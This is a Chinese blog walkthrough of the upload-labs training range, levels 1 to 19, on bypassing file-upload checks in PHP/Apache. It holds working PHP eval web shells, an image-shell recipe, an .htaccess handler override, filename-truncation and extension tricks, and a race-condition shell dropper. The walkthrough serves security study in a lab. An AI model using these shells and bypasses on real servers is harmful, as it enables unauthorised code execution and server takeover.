文件上传漏洞upload-labs1-19关详解

已于 2024-03-11 23:03:25 修改
阅读量1.7k 收藏 40
点赞数 21
文章标签: web安全
于 2024-03-07 16:04:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51780583/article/details/136536659
版权

目录

Pass-01 前端绕过

1.拿到题首先想到的是上传图片马,burp抓包修改文件名回php,然后用蚁剑连接

2.本pass在客户端使用js对不合法图片进行检查!,根据提示禁用浏览器使用Javascript*(或者删除前端JS验证代码),然后上传php木马

3.下载网页源代码,修改验证代码,添加php为可通过类型,在form标签里用action定位需要传送的url。

Pass-02 MIME验证

Pass-03 黑名单绕过

Pass-04 .htaccess绕过

1.上传htaccess文件,将jpg文件当成php代码执行(.htaccess这就是文件名)

2.同上根据源代码进行绕过文件名后缀

Pass-05 大小写绕过

1.和第4关比,本关没有进行大小写转换,可以尝试大小写绕过,如:.Php

2.分析源代码

Pass-06 空格绕过

1.和第四关比,本关没有收尾去关思路就是在文件后缀最后面添加空格,但由于windows特性,文件名后空格会被直接删除,不能直接上传.php后加空格,所以我们burp抓包再添加空格

2.分析源码

Pass-07 点绕过

Pass-08 ::$DATA绕过

1.本关少了去除字符串,那就在burp中抓包在文件名后加::$DATA

2.分析源码

Pass-09 点空格点绕过

Pass-10 双写绕过

Pass-11 目录可控(GET传参),%00截断

Pass-12 post传参,%00截断

Pass-13 图片头部检验

pass-14 getimagesize()图片马

Pass-15 exif_imagetype()图片马

Pass-16 二次渲染

Pass-17 条件竞争1

Pass-18 条件竞争2

Pass-19 %00截断

Pass-01 前端绕过

1.拿到题首先想到的是上传图片马,burp抓包修改文件名回php,然后用蚁剑连接

图片马制作:copy 1.png/b +1.php/a 2.png

php一句话木马:<?php eval($_POST['password']);?>

然后上传的文件路径在该网页的目录/upload/下

蚁剑连接:

2.本pass在客户端使用js对不合法图片进行检查!,根据提示禁用浏览器使用Javascript*(或者删除前端JS验证代码),然后上传php木马

3.下载网页源代码,修改验证代码,添加php为可通过类型,在form标签里用action定位需要传送的url。

注意:浏览器有缓存,开启无痕新页面

Pass-02 MIME验证

提示服务器对上传数据的MIME类型进行检验,我们可以上传php文件,然后burp抓包修改文件类型

通过源码可知,可修改文件类型为image/png、image/jpeg、image/jpg

Pass-03 黑名单绕过

提示禁止上传.asp|.aspx|.php|.jsp后缀文件,尝试用其他可执行php文件的后缀名进行绕过。如 .phtml .php5等,但是这里没有成功,需要修改apache配置文件

查看源代码:

分析:先文件名首位去空,删除文件名末尾的点,将空格后的后缀名传给$file_name,全部转换成小写,去除字符串::$DATA,再去尾部的空格,所以可以burp抓包,构造文件名后缀

“.php. . ”,php后面为点+空格+点+空格

Pass-04 .htaccess绕过

1.上传htaccess文件,将jpg文件当成php代码执行(.htaccess这就是文件名)

<FilesMatch "2222.jpg">

SetHandler application/x-httpd-php

</FilesMatch>

不行则在apache的httpd.conf里修改

再上传2222.jpg(由2222.php改写)

PHP代码:<?php phpinfo();?>

2.同上根据源代码进行绕过文件名后缀

同3

Pass-05 大小写绕过

1.和第4关比,本关没有进行大小写转换,可以尝试大小写绕过,如:.Php

2.分析源代码

".php. .",php后面为点空点

Pass-06 空格绕过

1.和第四关比,本关没有收尾去关思路就是在文件后缀最后面添加空格,但由于windows特性,文件名后空格会被直接删除,不能直接上传.php后加空格,所以我们burp抓包再添加空格

2.分析源码

php后面跟点空格,或者空格+点

Pass-07 点绕过

和第四关比,本关没有去除文件名末尾的点。和第六关一样,windows文件后缀名不能加“ . ”,一样使用burp抓包然后后缀加一个点。

Pass-08 ::$DATA绕过

在window的时候如果文件名+"::$DATA"会把::$DATA之后的数据当成文件流处理,不会检测后缀名,且保持::$DATA之前的文件名,他的目的就是不检查后缀名

1.本关少了去除字符串,那就在burp中抓包在文件名后加::$DATA

2.分析源码

php后点空点

Pass-09 点空格点绕过

$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //首尾去空

在第四关的基础上,本关禁用了所有的可以解析的后缀,但是我们可以从源码中看出,没有进行循环校验,分析源码:先删除文件末尾的点,然后返回从点开始的后面的文件后缀,转换小写,去除字符串,去掉首尾空格,所以可以构建

“.php. .”,php后面为点(绕过)+空格(过trim)+点(过deldot)的格式

Pass-10 双写绕过

分析源码

$file_name = trim($_FILES['upload_file']['name']);
#去除文件名两边空格
$file_name = str_ireplace($deny_ext,"", $file_name);
#查到$deny_ext中的后缀名返回为空
if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $file_name)) {
    $img_path = $UPLOAD_ADDR . '/' .$file_name;
    $is_upload = true;
}

这里发现会把黑名单里的内容替换为空,且没有做循环验证,可以burp抓包双写绕过。成功上传

Pass-11 目录可控(GET传参),%00截断

$img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
#rand(10,99)增加一个随机数,date("YmdHis")年月日时分秒

文件位置$img_path这个变量直接是拼接的,代表上传目录是可控的,可以使用 %00 截断后面的,上传由1.php改的1.jpg,burp抓包修改请求行文件位置为1.php%00。

00截断使用条件:

php版本小于5.3.4

php的magic_quotes_gpc为OFF状态

Pass-12 post传参,%00截断

和上一关比,只是改变了接受传参的方式,从get变成了post,post不会对%00进行解码,所以要对%00进行url解码,%00———>

这里解码可以在burp上输入%00,然后选中%00右键,然后如下图所示,然后转换后,结果如上图所示,像是空格。

Pass-13 图片头部检验

提示pass 检查图标内容开头2个字节!可以通过制作图片马的方式来绕过

上传成功后,还需要有可以将图片解析成php的功能才能成功连接,因为,合成的图片马,头部识别png,后缀名被改为png。图片马配合文件包含一起使用

我们可以写一个文件包含的文件放到upload-labs中

##include.php
<?php
/*
本页面存在文件包含漏洞,用于测试图片马是否能正常运行!
*/
header("Content-Type:text/html;charset=utf-8");
$file = $_GET['file'];
if(isset($file)){
    include $file;
}else{
    show_source(__file__);
}
?>

使用:

pass-14 getimagesize()图片马

本pass使用getimagesize()检查是否为图片文件!

分析源码:自定义函数模块,是校验文件后缀名是否为白名单里的内容,不是则返回false,后面主题就不能继续运行,还是上传图片马

Pass-15 exif_imagetype()图片马

看提示看到了exif_imagetype,利用php_exif来判断文件类型,用图片马绕过,方法同PASS-13

本关需要开启php_exif服务

Pass-16 二次渲染

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])){
    // 获得上传文件的基本信息,文件名,类型,大小,临时文件路径
    $filename = $_FILES['upload_file']['name'];
    $filetype = $_FILES['upload_file']['type'];
    $tmpname = $_FILES['upload_file']['tmp_name'];

    $target_path=$UPLOAD_ADDR.basename($filename);

    // 获得上传文件的扩展名
    $fileext= substr(strrchr($filename,"."),1);

    //判断文件后缀与类型,合法才进行上传操作
    if(($fileext == "jpg") && ($filetype=="image/jpeg")){
        if(move_uploaded_file($tmpname,$target_path))
        {
            //使用上传的图片生成新的图片
            $im = imagecreatefromjpeg($target_path);

            if($im == false){
                $msg = "该文件不是jpg格式的图片!";
            }else{
                //给新图片指定文件名
                srand(time());
                $newfilename = strval(rand()).".jpg";
                $newimagepath = $UPLOAD_ADDR.$newfilename;
                imagejpeg($im,$newimagepath);
                //显示二次渲染后的图片(使用用户上传图片生成的新图片)
                $img_path = $UPLOAD_ADDR.$newfilename;
                unlink($target_path);
                $is_upload = true;
            }
        }
        else
        {
            $msg = "上传失败!";
        }

分析源码,$target_path用basename()禁止修改文件目录,basename() 函数返回路径中的文件名部分。$fileext获取点后面的内容做后缀。

move_uploaded_file函数来做判断条件,如果成功将文件移动到$target_path,就会进入二次渲染的代码,反之上传失败.

imagecreatefromjpeg、imagecreatefrompng、imagecreatefromgif

imagecreatefromjpeg二次渲染它相当于是把原本属于图像数据的部分抓了出来,再用自己的API 或函数进行重新渲染在这个过程中非图像数据的部分直接就隔离开了。

这题可以先上传一张图片,再下载二次渲染后的图片,然后再在下载好的图片中添加一句话木马。

下图,左渲染后,右未渲染

我们在gif文件未被渲染的地方添加一句话就行

参考链接:文章

Pass-17 条件竞争1

条件竞争:条件竞争漏洞是一种服务器端的漏洞,由于服务器在处理不同请求时时并发进行的,因此处理不当会或者相关操作顺序设计的不合理时,将导致漏洞产生。

提示需要代码审计,分析源码

$is_upload = false;
$msg = null;

if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');#白名单
    $file_name = $_FILES['upload_file']['name'];#获取上传文件名
    $temp_file = $_FILES['upload_file']['tmp_name'];#临时文件名
    $file_ext = substr($file_name,strrpos($file_name,".")+1);#获取上传文件后缀名
    $upload_file = $UPLOAD_ADDR . '/' . $file_name;#文件存放目录

    if(move_uploaded_file($temp_file, $upload_file)){#如果文件不存在则放到upload_file
        if(in_array($file_ext,$ext_arr)){#如果文件后缀在白名单里,则继续
             $img_path = $UPLOAD_ADDR . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
             rename($upload_file, $img_path);重命名
             unlink($upload_file);
             $is_upload = true;
        }else{
            $msg = "只允许上传.jpg|.png|.gif类型文件!";
            unlink($upload_file);
        }
    }else{
        $msg = '上传失败!';
    }
}

分析代码可知,是文件可以先上传,然后再判断文件后缀名是否在白名单里,然后再删除,所以我们可以上传1.php,只要在它被删除之前访问就行。我们可以用burp的intruder模块不断上传,然后我们不断访问新地址即可

操作过程:

然后就可以重复发送不带payload的数据包

木马可以上传一个生成其他木马的php文件如:

<?php fputs(fopen('Tony.php','w'),'<?php @eval($_POST["Tony"])?>');?>

参考:文章17、18关

Pass-18 条件竞争2

index.php调用了MyUpload上传类,使用了upload方法。执行的顺序:服务器先是将文件后缀跟白名单做了对比,然后检查了文件大小以及文件是否已经存在。文件上传之后又对其进行了重命名。

绕过方法和上一关的一样,但是这关在上传之前用了白名单来检测,所以只能上传图片马,用Apache解析漏洞或者是文件包含漏洞来解析一句话木马。

Apache解析漏洞只跟文件配置有关系,通过在白名单但是apache文件不能解析的文件名后缀,他就会解析前一个文件后缀,如:shell.php.7z,当然具体要看mime.types里的映射具体没有白名单中的哪些

参考文章

Pass-19 %00截断

发现move_uploaded_file()函数中的img_path是由post参数save_name控制的,因此可以在save_name利用00截断绕过,方法同pass-12

打你的小脑斧
关注
  • 21
    点赞
  • 40
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP、Apache环境中部署upload-labs(文件上传漏洞靶场)
01-08
PHP、Apache环境中部署upload-labs(文件上传漏洞靶场)
upload-labs-master.zip
06-22
文件上传漏洞小游戏靶场upload-labs-master/upload-labs-master/upload-labs-master/upload-labs-master
upload-labs详解1-19全解(最全最详细一看就会)
最新发布
qq_53058639的博客
04-16 407
upload-labs是一个使用php语言编写的,专门收集渗透测试过程中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共19,每一都包含着不同上传方式。
上传文件漏洞靶场upload-labs
09-27
上传文件漏洞靶场upload-labs,用于练习上传文件漏洞,学习web安全的小白可用。我的博客也有详细的使用教程
upload-labs19-20以及总结1
08-08
第一步:直接上传php文件,保存名称填成PHP第二步:抓包分析可以看到filename是文件本来的名称,而save_name是传递的参数,此处改为PHP可以绕过
文件上传upload-labs(一)
01-08
文件上传漏洞 通过上传攻击性文件(木马,病毒,恶意脚本)绕过检测到服务器并执行; 个人觉得不喜欢这些概念,通过实操更加能理解和掌握; 使用xampp、phpstudy、docker搭建upload-labs,三者都可,docker最方便但是我不是太熟悉,xampp安装的时候有很多工序,所以我选择的是phpstudy搭建了靶机环境,个人觉得学习文件上传用dvwa好一点,这个用来训练和复习,但是不得不说的是,至少前十题那个套路实在是没意思,下面是思维导图: 废话少说直接进入: 进入是这样的,开始训练吧。 pass-01: 新建一个PHP文件,使用一句话木马上传 提示我们文件类型不符合要求要上
upload-labs(Pass1-19详解)
m0_53567065的博客
11-10 2217
文件上传也是和RCE类型的危害相同的,如果我们可以任意上传文件且服务器可以解析的话那么就相当于我们可以执行任意的文件代码,从而控制了整个服务器。在实战渗透中,我们打点最快的方式就是寻找是否存在文件上传的功能点。不过一般都是后台会存在这样的功能点且漏洞较多。一旦我们将文件传到服务器之后,就可以通过webshell管理工具进行连接。上传文件之前我们需要先清楚web服务是基于什么语言开发的,是否会将我们的文件进行解析。当然这个都需要我们实际进行测试。
upload-labs之第十九和二十以及总结
田田云逸的博客
10-28 1534
Pass19 打开第十九,发现上传的地方还可以定义上传的文件名 再看看提示 这里说这个文件名是用的post方式传递的,那么看看源码到底要怎么绕过 $is_upload = false;$msg = null;if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array("php","php5","php4","php3","php2","html","htm".
upload-labs 1-19思路
qq_51534701的博客
08-14 2007
upload.test Pass-01 删除check方法return checkFile() 如果浏览器不允许修改前端代码,就使用抓包工具修改 然后上传一句话木马 Pass-02 后端校验content-type 把typege更改成image/jpeg Pass-03 php::DATA相当于1.php2.php:a.jpg会生成2.php但内容是在我们2.php:a.jpg中(不用这个)双写::DATA 相当于1.php 2.php:a.jpg 会生成2.php 但内容是在我们2.php:
upload-labs_pass19_条件竞争+apache解析漏洞
qq_51550750的博客
04-12 1598
pass19-源码和提示 提示: 源码: //index.php $is_upload = false; $msg = null; if (isset($_POST['submit'])) { require_once("./myupload.php"); $imgFileName =time(); $u = new MyUpload($_FILES['upload_file']['name'], $_FILES['upload_file']['tmp_name'], $_FIL
文件上传upload-labs第十一至十九
你的小粉丝的博客
10-14 2981
白名单,%00截断(需要两个条件:php版本小于5.3.4;php的magic_quotes_gpc为OFF状态) 另save_path等于下面的值:…/upload/4.php%00 BP修改一下抓到的包
upload-labs靶场通指南(18-19
永远是少年
09-16 937
今天继续给大家介绍渗透测试相知识,本文主要内容是upload-labs靶场通指南(18-19)。 一、第18 二、第19
upload-labs】pass-19~pass20完结篇
qq_43665434的博客
03-23 681
upload-labs】pass-19~pass20完结篇 【pass-19】00截断 1、源码分析 2、测试流程 先尝试上传一个一句话木马muma.php 用burp抓包: 在raw中将加号的2b替换为null的00 变换后结果: 如图所示,上传成功! 然后直接菜刀连接即可。 小结 00截断的原理前面提到过,不明白的小伙伴可以取看看传送门 我觉得是否可以利用00截断的本质,还是要看最后文件的保存路径用户是否可控。 【pass-20】特殊+windows特性绕过 1、源码分析 if (iss
【渗透测试】--- upload-labs(1-19)闯
qq_43168364的博客
08-22 741
第一 1、检测方式 JS代码前端检测 2、绕过方式 Fn+F12删除前端代码的事件 3、具体步骤 上传.php文件之后给我们提示 由此猜测可能是用了js前端代码的验证,我们查看它的前端代码 这里果然有一个事件,我们将该事件删除,即可上传bug.php文件 上传解析成功 4、源码分析 第二 1、检测方式 服务器端MIME类型检测 2、绕过方式 将我们的木马文件改名为xxx.jpg,开启bp拦截,点击上传,这样我们MIME类型就是图片的了,然后该文件名为xxx.php即可 3、具体步骤 上传重命
upload-labs 全1-21 附详细解析文件上传漏洞
weixin_47306547的博客
09-08 7393
第 1 客户端 JavaScript检验(通常为检测文件拓展名) 判断方法:在浏览加载文件,但还未点击上传按钮时便弹出对话框,内容如:只允许上传 .jpg / .jpeg / .png 后缀名的文件,而此时并未发送数据包。 绕过办法:1.利用BurpSuite之类的代理工具进行抓包。 2.修改webshell后缀类型为允许上传类型。 3.抓包来拦截将其后缀名改为对应服务器可以解析的后缀名。 第 2 服务器MI
upload-labs靶场学习笔记1-21
qq_56426046的博客
08-27 1647
服务器端使用白名单防御,修复 web 中间件的漏洞,禁止客户端存在可控参 数,存放文件目录禁止脚本执行,限制后缀名 一定要设置图片格式 jpg、gif 、 png 文件名随机的,不可预测。
upload靶场第十九 apache解析漏洞+条件竞争绕过
2301_79650865的博客
02-09 397
upload靶场第十九 apache解析漏洞+条件竞争绕过 详细教程
文件上传漏洞-uploadlabs靶场11~20解析
黄乔国PHP
03-19 1129
在现代互联网的web应用程序中,上传文件是一种常见的功能,因为它有助于提高业务效率,比如社交网站中,允许用户上传图片、视频、头像和许多其他类型的文件。然而向用户提供的功能越多,web应用受到攻击的风险就越大,如果web应用存在文件上传漏洞,那么恶意用户就可以利用文件上传漏洞将可执行脚本程序上传到服务器中,获取网站的权限,或者进一步危害服务器。
upload-labs详解------持续更新
yuqie的博客
08-01 746
巩固基础,才能继续往高处走。
upload-labs19
07-28
根据引用\[1\]中的内容,通upload-labs的第19的方法如下: 1. 打开18的myupload.php文件,进行修改,确保上传的图片可以放到upload文件夹下。 2. 与第17类似,这还会检测文件的后缀名,所以需要上传一个图片马,而不是直接上传php文件。 3. 上传一个名为22.gif的图片,并进行抓包。 4. 进行与第17相似的攻击过程,点击"Start Attack"按钮。 5. 完成以上步骤后,即可成功通19。 以上是通upload-labs第19的方法。根据引用\[2\]中的内容,这些方法在实战中可能会有所不同,但基本原理是相似的。希望这些方法能对你的学习有所帮助。 #### 引用[.reference_title] - *1* *2* [upload-labs详解1-19全解(最全最详细一看就会)](https://blog.csdn.net/qq_53003652/article/details/129969951)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [upload-labs通](https://blog.csdn.net/as604049322/article/details/127418017)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值